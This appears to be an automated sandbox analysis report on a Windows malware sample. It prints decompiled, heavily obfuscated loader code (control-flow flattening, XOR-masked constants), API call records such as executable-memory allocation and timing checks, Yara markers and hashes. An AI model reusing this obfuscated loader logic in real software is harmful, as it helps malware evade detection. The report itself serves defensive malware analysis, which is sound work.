				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				unsigned int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				unsigned int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _t395;
				signed short* _t397;
				signed int* _t409;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t428;
				signed int* _t456;
				void* _t457;
				signed short* _t463;
				signed int* _t464;

				_t464 =  &_v1724;
				_v1568 = 0x36ffb4;
				_t409 = 0;
				_v1564 = 0;
				_v1676 = 0x584fb8;
				_t411 = 0x1d;
				_v1676 = _v1676 * 0x1d;
				_t457 = 0x1b64447;
				_v1676 = _v1676 / _t411;
				_t412 = 0x6f;
				_v1676 = _v1676 / _t412;
				_v1676 = _v1676 ^ 0x0000cb85;
				_v1604 = 0xc1ae83;
				_t413 = 0x56;
				_v1604 = _v1604 / _t413;
				_v1604 = _v1604 ^ 0x000f18c4;
				_v1688 = 0x38431b;
				_t414 = 0x16;
				_v1688 = _v1688 / _t414;
				_v1688 = _v1688 | 0xdd383ab3;
				_v1688 = _v1688 + 0x4281;
				_v1688 = _v1688 ^ 0xdd35318f;
				_v1628 = 0x833ab2;
				_v1628 = _v1628 + 0x63e6;
				_v1628 = _v1628 << 8;
				_v1628 = _v1628 ^ 0x839980ec;
				_v1612 = 0xb556f1;
				_v1612 = _v1612 * 0x78;
				_v1612 = _v1612 ^ 0x5500bab3;
				_v1572 = 0xa45959;
				_v1572 = _v1572 >> 0xf;
				_v1572 = _v1572 ^ 0x000fd25f;
				_v1692 = 0xd16d41;
				_v1692 = _v1692 | 0x340f23c2;
				_v1692 = _v1692 ^ 0x9f498c44;
				_v1692 = _v1692 >> 6;
				_v1692 = _v1692 ^ 0x02ade8db;
				_v1592 = 0x14b990;
				_v1592 = _v1592 >> 7;
				_v1592 = _v1592 ^ 0x00054ad6;
				_v1720 = 0xd7e8d0;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 ^ 0xefc0bd75;
				_v1720 = _v1720 >> 1;
				_v1720 = _v1720 ^ 0x77e2f4cc;
				_v1644 = 0xcdd95a;
				_v1644 = _v1644 + 0x4476;
				_v1644 = _v1644 + 0xffffb498;
				_v1644 = _v1644 ^ 0x00c0d23c;
				_v1704 = 0xe3fb79;
				_v1704 = _v1704 + 0xffff6dba;
				_v1704 = _v1704 << 0x10;
				_v1704 = _v1704 | 0xe4211d15;
				_v1704 = _v1704 ^ 0xed3b202c;
				_v1580 = 0x8ccfef;
				_v1580 = _v1580 + 0xffff27af;
				_v1580 = _v1580 ^ 0x0080bd98;
				_v1712 = 0x99380d;
				_v1712 = _v1712 * 0x73;
				_v1712 = _v1712 | 0xaaf867c5;
				_v1712 = _v1712 + 0xc9a5;
				_v1712 = _v1712 ^ 0xeef64655;
				_v1636 = 0x50e410;
				_v1636 = _v1636 + 0x1e20;
				_v1636 = _v1636 + 0xffff4182;
				_v1636 = _v1636 ^ 0x0056b2e1;
				_v1616 = 0xd2da90;
				_t415 = 0x60;
				_v1616 = _v1616 * 0x35;
				_v1616 = _v1616 ^ 0x2ba97592;
				_v1696 = 0xbc3c6b;
				_v1696 = _v1696 + 0xfffff6d9;
				_v1696 = _v1696 | 0xb783fbae;
				_v1696 = _v1696 ^ 0xb7bd5992;
				_v1708 = 0x771441;
				_v1708 = _v1708 | 0xf82377d1;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 / _t415;
				_v1708 = _v1708 ^ 0x00443fee;
				_v1588 = 0x65b21e;
				_v1588 = _v1588 | 0x7d4e0876;
				_v1588 = _v1588 ^ 0x7d68971d;
				_v1716 = 0x8e40c0;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 + 0xc0ab;
				_v1716 = _v1716 >> 8;
				_v1716 = _v1716 ^ 0x007a6d07;
				_v1648 = 0x7e5980;
				_v1648 = _v1648 + 0xc9ae;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 ^ 0x000829ad;
				_v1656 = 0x8fd10;
				_v1656 = _v1656 + 0xfffff894;
				_v1656 = _v1656 + 0xffffdf7a;
				_v1656 = _v1656 ^ 0x000e8efb;
				_v1608 = 0xbb9d2c;
				_v1608 = _v1608 + 0xbd30;
				_v1608 = _v1608 ^ 0x00bdd480;
				_v1684 = 0x415fdf;
				_v1684 = _v1684 + 0xdc54;
				_v1684 = _v1684 + 0xffff96e0;
				_v1684 = _v1684 + 0x9fc;
				_v1684 = _v1684 ^ 0x0043ddfd;
				_v1652 = 0xdd7ba0;
				_t416 = 0x49;
				_v1652 = _v1652 / _t416;
				_t417 = 0x2a;
				_v1652 = _v1652 / _t417;
				_v1652 = _v1652 ^ 0x00058d13;
				_v1584 = 0x6ae312;
				_v1584 = _v1584 * 0x21;
				_v1584 = _v1584 ^ 0x0dc9c4b0;
				_v1620 = 0x23aa9f;
				_v1620 = _v1620 + 0xb48c;
				_v1620 = _v1620 ^ 0x002fca40;
				_v1700 = 0x132cac;
				_v1700 = _v1700 * 0x1f;
				_v1700 = _v1700 << 7;
				_v1700 = _v1700 | 0xca58c5cf;
				_v1700 = _v1700 ^ 0xeb72e8c5;
				_v1640 = 0x741ded;
				_v1640 = _v1640 << 9;
				_v1640 = _v1640 * 0x2c;
				_v1640 = _v1640 ^ 0xea4716ed;
				_v1576 = 0x109ef0;
				_v1576 = _v1576 + 0x16b8;
				_v1576 = _v1576 ^ 0x0011ebb3;
				_v1632 = 0x7cebdd;
				_v1632 = _v1632 ^ 0x038cae16;
				_v1632 = _v1632 | 0xb819cae3;
				_v1632 = _v1632 ^ 0xbbfb8962;
				_v1600 = 0x5bcfc;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x000bee76;
				_v1660 = 0x21d579;
				_v1660 = _v1660 >> 5;
				_t418 = 0x4b;
				_v1660 = _v1660 / _t418;
				_v1660 = _v1660 ^ 0x0004c5f2;
				_v1724 = 0x8114ac;
				_v1724 = _v1724 >> 2;
				_v1724 = _v1724 ^ 0x9b842acc;
				_t419 = 0x15;
				_v1724 = _v1724 * 0x47;
				_v1724 = _v1724 ^ 0x2a960869;
				_v1668 = 0x55a452;
				_v1668 = _v1668 + 0xffff8381;
				_v1668 = _v1668 >> 2;
				_v1668 = _v1668 | 0x1d7ab292;
				_v1668 = _v1668 ^ 0x1d76c4c4;
				_v1664 = 0xcd9a39;
				_v1664 = _v1664 | 0xf6956366;
				_v1664 = _v1664 ^ 0xa704dcbd;
				_v1664 = _v1664 ^ 0x80b7ad6d;
				_v1664 = _v1664 ^ 0xd16ddcfa;
				_v1624 = 0x5e384e;
				_v1624 = _v1624 | 0x0279201c;
				_v1624 = _v1624 ^ 0x0272d0df;
				_v1672 = 0x7ea98a;
				_v1672 = _v1672 + 0xffff0289;
				_v1672 = _v1672 + 0x1222;
				_v1672 = _v1672 + 0xffff9ce5;
				_v1672 = _v1672 ^ 0x007460bd;
				_v1596 = 0x9a7c86;
				_t463 = _v1624;
				_v1596 = _v1596 / _t419;
				_v1596 = _v1596 ^ 0x0006072a;
				_v1680 = 0x2b5395;
				_v1680 = _v1680 * 0x7b;
				_v1680 = _v1680 << 3;
				_v1680 = _v1680 * 0x28;
				_v1680 = _v1680 ^ 0x057a2c11;
				while(_t457 != 0x1b64447) {
					if(_t457 == 0x7158915) {
						_push(_v1680);
						_push(_t463);
						_push(_t409);
						_push(_v1596);
						_push(_v1672);
						_push(_v1624);
						_push(_t409);
						_push(_t409);
						E00BD06EF(_v1664, __eflags);
						_t409 = 1;
						__eflags = 1;
					} else {
						if(_t457 == 0xb45334e) {
							_push(E00BB151C);
							_t395 = E00BC0207(_v1644, E00BD0AD3(_v1592, _v1720, __eflags), _v1704,  &_v1560, _v1580, _v1712); // executed
							asm("sbb edi, edi");
							_t420 = _v1636;
							_t457 = ( ~_t395 & 0xfdcb883a) + 0xf869d0e;
							E00BC2EED(_t420, _v1616, _v1696, _t393);
							_t464 =  &(_t464[7]);
							goto L20;
						} else {
							if(_t457 == 0xc0db4d7) {
								_t397 = _t463;
								__eflags =  *_t463 - _t409;
								while(__eflags != 0) {
									__eflags =  *_t397 - 0x2c;
									if( *_t397 == 0x2c) {
										_t456 =  &_v1560;
										while(1) {
											_t397 =  &(_t397[1]);
											_t428 =  *_t397 & 0x0000ffff;
											__eflags = _t428;
											if(_t428 == 0) {
												break;
											}
											__eflags = _t428 - 0x20;
											if(_t428 != 0x20) {
												 *_t456 = _t428;
												_t456 =  &(_t456[0]);
												__eflags = _t456;
												continue;
											}
											break;
										}
										_t420 = 0;
										__eflags = 0;
										 *_t456 = 0;
									}
									_t397 =  &(_t397[1]);
									__eflags =  *_t397 - _t409;
								}
								_t457 = 0xb45334e;
								continue;
							} else {
								if(_t457 == 0xd522548) {
									_push(_t420);
									E00BBE259(_v1708, _v1676, _v1588, _v1716, _t420, _t420,  &_v1040, _v1648, _v1656);
									E00BB24AA(_v1708, _v1608, __eflags,  &_v520, _v1684, _v1652, _v1584);
									E00BD06A6(__eflags,  &_v1040, _v1640, E00BD0AD3(_v1620, _v1700, __eflags), _v1576, _v1632, _t463, _v1600);
									_t464 =  &(_t464[0x14]);
									E00BC2EED(_v1660, _v1724, _v1668, _t402);
									_t420 = 0xbb14dc;
									_t457 = 0x7158915;
									continue;
								} else {
									if(_t457 != 0xff08286) {
										L20:
										__eflags = _t457 - 0xf869d0e;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t463 = E00BB6617();
										_t457 = 0xc0db4d7;
										continue;
									}
								}
							}
						}
					}
					return _t409;
				}
				_t420 = _v1604;
				E00BB3965(_t420, _v1688,  &_v1560, _v1628, 0x208, _v1612);
				_t464 =  &(_t464[4]);
				_t457 = 0xff08286;
				goto L20;
			}

0x00bced95
0x00bced9b
0x00bcedab
0x00bcedad
0x00bcedb4
0x00bcedc4
0x00bcedc7
0x00bcedcb
0x00bcedd8
0x00bcede0
0x00bcede5
0x00bcedeb
0x00bcedf3
0x00bcee05
0x00bcee0a
0x00bcee13
0x00bcee1e
0x00bcee2a
0x00bcee2d
0x00bcee31
0x00bcee39
0x00bcee41
0x00bcee49
0x00bcee51
0x00bcee59
0x00bcee5e
0x00bcee66
0x00bcee79
0x00bcee80
0x00bcee8b
0x00bcee96
0x00bcee9e
0x00bceea9
0x00bceeb1
0x00bceeb9
0x00bceec1
0x00bceec6
0x00bceece
0x00bceed9
0x00bceee1
0x00bceeec
0x00bceef4
0x00bceef9
0x00bcef01
0x00bcef05
0x00bcef0d
0x00bcef15
0x00bcef1d
0x00bcef25
0x00bcef2d
0x00bcef35
0x00bcef3d
0x00bcef42
0x00bcef4a
0x00bcef52
0x00bcef5d
0x00bcef68
0x00bcef73
0x00bcef80
0x00bcef84
0x00bcef8e
0x00bcef96
0x00bcef9e
0x00bcefa6
0x00bcefae
0x00bcefb6
0x00bcefbe
0x00bcefcd
0x00bcefd0
0x00bcefd7
0x00bcefe2
0x00bcefea
0x00bceff2
0x00bceffa
0x00bcf002
0x00bcf00a
0x00bcf012
0x00bcf01f
0x00bcf023
0x00bcf02b
0x00bcf036
0x00bcf041
0x00bcf04c
0x00bcf054
0x00bcf059
0x00bcf061
0x00bcf066
0x00bcf06e
0x00bcf076
0x00bcf07e
0x00bcf083
0x00bcf08b
0x00bcf093
0x00bcf09b
0x00bcf0a3
0x00bcf0ab
0x00bcf0b6
0x00bcf0c1
0x00bcf0cc
0x00bcf0d4
0x00bcf0dc
0x00bcf0e4
0x00bcf0ec
0x00bcf0f4
0x00bcf100
0x00bcf105
0x00bcf10f
0x00bcf112
0x00bcf116
0x00bcf11e
0x00bcf131
0x00bcf138
0x00bcf143
0x00bcf14b
0x00bcf153
0x00bcf15b
0x00bcf168
0x00bcf16c
0x00bcf171
0x00bcf179
0x00bcf181
0x00bcf189
0x00bcf193
0x00bcf197
0x00bcf19f
0x00bcf1ac
0x00bcf1b7
0x00bcf1c2
0x00bcf1ca
0x00bcf1d2
0x00bcf1da
0x00bcf1e2
0x00bcf1ed
0x00bcf1f5
0x00bcf200
0x00bcf208
0x00bcf213
0x00bcf218
0x00bcf21e
0x00bcf226
0x00bcf22e
0x00bcf233
0x00bcf240
0x00bcf241
0x00bcf245
0x00bcf24d
0x00bcf255
0x00bcf25d
0x00bcf262
0x00bcf26a
0x00bcf272
0x00bcf27a
0x00bcf282
0x00bcf28a
0x00bcf292
0x00bcf29a
0x00bcf2a2
0x00bcf2aa
0x00bcf2b2
0x00bcf2ba
0x00bcf2c2
0x00bcf2ca
0x00bcf2d2
0x00bcf2da
0x00bcf2ee
0x00bcf2f2
0x00bcf2f9
0x00bcf304
0x00bcf311
0x00bcf315
0x00bcf31f
0x00bcf323
0x00bcf32b
0x00bcf33d
0x00bcf52b
0x00bcf52f
0x00bcf530
0x00bcf531
0x00bcf538
0x00bcf53c
0x00bcf547
0x00bcf548
0x00bcf549
0x00bcf553
0x00bcf553
0x00bcf343
0x00bcf349
0x00bcf490
0x00bcf4b9
0x00bcf4ce
0x00bcf4d0
0x00bcf4dd
0x00bcf4e3
0x00bcf4e8
0x00000000
0x00bcf34f
0x00bcf355
0x00bcf440
0x00bcf442
0x00bcf446
0x00bcf448
0x00bcf44c
0x00bcf44e
0x00bcf463
0x00bcf463
0x00bcf466
0x00bcf469
0x00bcf46c
0x00000000
0x00000000
0x00bcf457
0x00bcf45b
0x00bcf45d
0x00bcf460
0x00bcf460
0x00000000
0x00bcf460
0x00000000
0x00bcf45b
0x00bcf46e
0x00bcf46e
0x00bcf470
0x00bcf470
0x00bcf473
0x00bcf476
0x00bcf476
0x00bcf47b
0x00000000
0x00bcf35b
0x00bcf361
0x00bcf388
0x00bcf3ae
0x00bcf3d1
0x00bcf41a
0x00bcf41f
0x00bcf42f
0x00bcf435
0x00bcf436
0x00000000
0x00bcf363
0x00bcf369
0x00bcf51d
0x00bcf51d
0x00bcf523
0x00000000
0x00000000
0x00bcf529
0x00bcf36f
0x00bcf37f
0x00bcf381
0x00000000
0x00bcf381
0x00bcf369
0x00bcf361
0x00bcf355
0x00bcf349
0x00bcf560
0x00bcf560
0x00bcf508
0x00bcf510
0x00bcf515
0x00bcf518
0x00000000

Strings

H%R, xrefs: 00BCF35B
?D, xrefs: 00BCF023
, ;, xrefs: 00BCEF4A
N8^, xrefs: 00BCF29A
?D, xrefs: 00BCF017
vD, xrefs: 00BCEF15
c, xrefs: 00BCEE51

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: , ;$H%R$N8^$vD$?D$?D$c
API String ID: 0-926347615
Opcode ID: 257a66d37b81bd3eeb722858d47f7d61460a35083a463049f827b1c3c81a305e
Instruction ID: 29536eb1c0e2537c2422ee378460d48070834f994e45f6023326810aeb114a13
Opcode Fuzzy Hash: 257a66d37b81bd3eeb722858d47f7d61460a35083a463049f827b1c3c81a305e
Instruction Fuzzy Hash: 981210B25093819FD368CF25C58AA5BBBF2FBC0718F10891DE2D986260D7B18948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ED2C225
GetLastError.KERNEL32 ref: 6ED2C22B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6ED2C247

Strings

asd, xrefs: 6ED2C21C

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 1d4a2850345daad4fcdb060f8d950a5943699dbac096fbe65a1e893492f01cb4
Instruction ID: aa711dee03fac09ca43a1929102e52cd5a08ca30478b20ccc522108e3cf013f4
Opcode Fuzzy Hash: 1d4a2850345daad4fcdb060f8d950a5943699dbac096fbe65a1e893492f01cb4
Instruction Fuzzy Hash: 72E18971A08306CFDB50CF98C890B2AB7E1BF88708F15496DEA958F385D771E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED11290, Relevance: 3.9, APIs: 3, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BE96
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BEB4
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BECD
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BECF
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BED6
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BEF4

GetProcessHeap.KERNEL32 ref: 6ED11333
HeapAlloc.KERNEL32(01390000,00000000,00023800), ref: 6ED1134D
HeapFree.KERNEL32(00000000), ref: 6ED11437

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: 2a95a6a57b865bf62c86f9a8f3d144e23c12864f90779f53f1ce3cd69a29f984
Instruction ID: 76de100a225993ec88870508900bf8faa4ee989821f236b8da901f5ca8eae16c
Opcode Fuzzy Hash: 2a95a6a57b865bf62c86f9a8f3d144e23c12864f90779f53f1ce3cd69a29f984
Instruction Fuzzy Hash: 6051BE74A04B408FD320CF69D940A96BBF4FF59318F108A2DE9D68BA95D734F545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C8DB, Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6ED2C922
___scrt_uninitialize_crt.LIBCMT ref: 6ED2C93C

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: f1acdbcfe2af08627dce4b526b258ad5505f90ab919c3d97c5408dbc00449632
Instruction ID: bf00e9a14408d4c97fe1ef78394aa3515aea44fa4c2ee69c1d4e52c227bef58f
Opcode Fuzzy Hash: f1acdbcfe2af08627dce4b526b258ad5505f90ab919c3d97c5408dbc00449632
Instruction Fuzzy Hash: A1417D72E05625EFDB518FE8CC00BAE7AB8EF85B5DF114525EA146B290C734CD029BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C98B, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6ED2C9C8
dllmain_crt_dispatch.LIBCMT ref: 6ED2C9DF
dllmain_raw.LIBCMT ref: 6ED2CA27
dllmain_crt_dispatch.LIBCMT ref: 6ED2CA3A
dllmain_raw.LIBCMT ref: 6ED2CA4D

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 7b8d1310531eeb3815f3f36808779071d927ba3d8ff118c5a7d1d622fc8419f6
Instruction ID: 1d3e2dac8d8de50ddf9d329b217b75a7a9745da20d8b5e9ce425dacbd8391e22
Opcode Fuzzy Hash: 7b8d1310531eeb3815f3f36808779071d927ba3d8ff118c5a7d1d622fc8419f6
Instruction Fuzzy Hash: 17212C72E05669EFDB618BA9CC40AAE3A69EB85B9CF014535FA146F250D730CD418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ED1C2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ED1C2B5

Strings

api-ms-win-core-synch-l1-2-0, xrefs: 6ED1C2A0
WakeByAddressSingle, xrefs: 6ED1C2AF

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: d01959ced64a159f238ee7bafd65af4daa22557c1e59122427a95e1221248668
Instruction ID: 5725c4016c09d37a9390e4c2a7f7b650b532d9b84cdfdb4e0354cacbd6cff95d
Opcode Fuzzy Hash: d01959ced64a159f238ee7bafd65af4daa22557c1e59122427a95e1221248668
Instruction Fuzzy Hash: 66B092B4F08501ABAEB0ABF24A0CB863B98A9922827000454A511EE208EA24C40ADA22

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ED1C325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ED1C335

Strings

api-ms-win-core-synch-l1-2-0, xrefs: 6ED1C320
WaitOnAddress, xrefs: 6ED1C32F

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: 56d26acc9feb726eff11ad0a9cad2074358236156d4bd33465b12236bd7e0505
Instruction ID: d334e97be1575e5839dc7c7f389c1ab97af7c88958f05cbc237d79f203e10960
Opcode Fuzzy Hash: 56d26acc9feb726eff11ad0a9cad2074358236156d4bd33465b12236bd7e0505
Instruction Fuzzy Hash: C3B092B4F04501A7AE70ABF25A0CA862A58A96228270004606016DD219EA24C005D921

Uniqueness

Uniqueness Score: -1.00%

Function 6ED34161, Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6ED34169

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ED341A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ED341C1

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 29caf1f13d4bbff6d1f9d82fa9481067fb29315fa14cbc525a14447b6878a678
Instruction ID: 7ddb0a2767b2aa5e839666aa0c7c6379a7fac73ea90e93d7fdfb8aced8918e80
Opcode Fuzzy Hash: 29caf1f13d4bbff6d1f9d82fa9481067fb29315fa14cbc525a14447b6878a678
Instruction Fuzzy Hash: 6D11A1A2A05E36BE6A1117F69C89CAF6A6CDE572983204915F401D2181EB6ACD0381B1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C7D4, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6ED2C821

Part of subcall function 6ED2CEAD: InitializeSListHead.KERNEL32(6ED6E4A0,6ED2C82B,6ED6AF60,00000010,6ED2C7BC,?,?,?,6ED2C9E4,?,00000001,?,?,00000001,?,6ED6AFA8), ref: 6ED2CEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ED2C88B

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 549c26650d1fdca2f66c6069d0ad3019c7443e6039f895f72f2579696e380482
Instruction ID: b58b437233e9e4609acb9f85247fbcdfc1468b7a514d971e14f5e35476b5138a
Opcode Fuzzy Hash: 549c26650d1fdca2f66c6069d0ad3019c7443e6039f895f72f2579696e380482
Instruction Fuzzy Hash: 74213532648245AEEF406BF4C8007DC73649F1736CF208C36D6502F2C2DB62C945DAB6

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 00BC02E1

Strings

(Gt, xrefs: 00BC025E

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 32e102e3caf27624fe9c29bfca4fed61d4c7eedeebf9592047b2b846b9af71bb
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: B62166B5E00208FBEF04DFA4CC0A9DEBBB2FB44314F108199E525AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3475C, Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

